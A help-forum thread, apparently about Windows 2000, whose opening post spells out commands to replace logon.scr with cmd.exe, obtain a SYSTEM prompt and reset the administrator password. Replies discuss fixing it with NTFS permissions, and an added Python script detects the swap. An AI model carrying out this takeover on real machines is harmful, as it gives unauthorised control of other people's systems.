I have a new exploit for you all to figure a way round

This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.


If you can log in as an account, drop to DOS (Start -> Run -> cmd). At the C: prompt type the following (assuming default install locations):

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine. logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just do
C:\> net user administrator <newpassword>
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.


 
Credits:

Author: Will W.

 
Asked by wirehead203
MSGeek commented:
To clarify, you are looking for a way around this exploit? It does not even sound like you are sure it works?
0
craigtin commented:
I think you answer your own question. If you allow full permission to the system folders for users, why do you care if they can rename a file?
0
MSGeek commented:
By the way, this exploit does work.  
0
craigtin commented:
Even if you restrict users' rights on the folders?
Then the command prompt must be using system privilege.
0

MSGeek commented:
If you change NTFS rights so they cannot del and copy (rename) the file, you're OK. This will not work with default security settings for normal users in XP. But it does in 2000 and 2000 Server.
0
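A defender-side check for the swap described in the question, as an added example that is not part of the original thread: it flags a logon.scr that is byte-identical to cmd.exe and any leftover logon.scr.* backup copy. The function names are hypothetical, and the default path is an assumption taken from the default install location the post mentions.

```python
from __future__ import annotations

import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_logon_screensaver(system32: Path) -> list[str]:
    """Return findings for the logon.scr swap described in this thread.

    Assumption: system32 is the directory holding logon.scr and cmd.exe
    (C:\\winnt\\system32 on a default Windows 2000 install, per the post).
    """
    findings = []
    scr = system32 / "logon.scr"
    cmd = system32 / "cmd.exe"
    if not scr.is_file():
        findings.append("logon.scr is missing")
    elif cmd.is_file() and sha256_of(scr) == sha256_of(cmd):
        # The screen saver slot holds a copy of the command interpreter.
        findings.append("logon.scr is byte-identical to cmd.exe")
    # Renamed copies of the original screen saver are a leftover of the swap.
    for leftover in sorted(system32.glob("logon.scr.*")):
        findings.append(f"backup copy present: {leftover.name}")
    return findings


if __name__ == "__main__":
    import sys

    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(r"C:\winnt\system32")
    for line in audit_logon_screensaver(target) or ["no findings"]:
        print(line)
```

The hash comparison only catches a straight copy of cmd.exe; restricting delete and write rights on the file, as MSGeek describes, is what prevents the swap in the first place.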
CleanupPing commented:
wirehead203:
This old question needs to be finalized -- accept an answer, split points, or get a refund.  For information on your options, please click here-> http:/help/closing.jsp#1 
EXPERTS:
Post your closing recommendations!  No comment means you don't care.
0
MSGeek commented:
wirehead.. how'd you make out with this.  MSGeek.
0
MSGeek commented:
Thanks Modulo.  MSGeek
0